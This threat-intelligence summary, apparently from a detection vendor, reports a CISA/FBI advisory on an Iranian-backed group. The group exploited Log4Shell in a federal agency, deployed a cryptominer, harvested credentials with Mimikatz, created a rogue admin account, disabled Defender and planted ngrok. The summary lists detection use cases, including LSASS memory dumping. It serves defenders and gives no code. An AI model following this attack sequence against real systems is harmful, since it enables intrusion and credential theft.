Iranian-backed Threat Actor Exploits Log4Shell Vulnerability

Category: Threat Actor Activity | Industry: Government | Level: Tactical | Source: CISA

A joint advisory from U.S government agencies Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) attributed an attack against a Federal Civilian Executive Branch (FCEB) organization to an Iranian-backed threat group. CISA identified signs of compromise as early as February 2022, with suspicious traffic observed using an FCEB-wide intrusion detection system (IDS) named EINSTEIN. The threat actors compromised the organization using the Log4Shell (CVE-2021-44228) remote code execution vulnerability, ultimately leading to the deployment of the XMRig cryptomining malware. During the post-exploitation stages, the threat actors also compromised credentials with Mimikatz, modified Windows Defender settings and set up persistence with a new user account, and created reverse proxies using ngrok. "The threat actors then executed Mimikatz on VDI-KMS to harvest credentials and created a rogue domain administrator account [T1136.002]. Using the newly created account, the actors leveraged RDP to propagate to several hosts within the network. Upon logging into each host, the actors manually disabled Windows Defender via the Graphical User Interface (GUI) and implanted Ngrok executables and configuration files. The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot." CISA and the FBI strongly encourage organizations to patch against the Log4Shell vulnerability going as far as to say, organizations should assume a breach and conduct threat hunting if they haven't done so.

Anvilogic Use Cases:

• Potential CVE-2021-44228 - Log4Shell
• RDP Connection
• Common LSASS Memory Dump Behavior

‍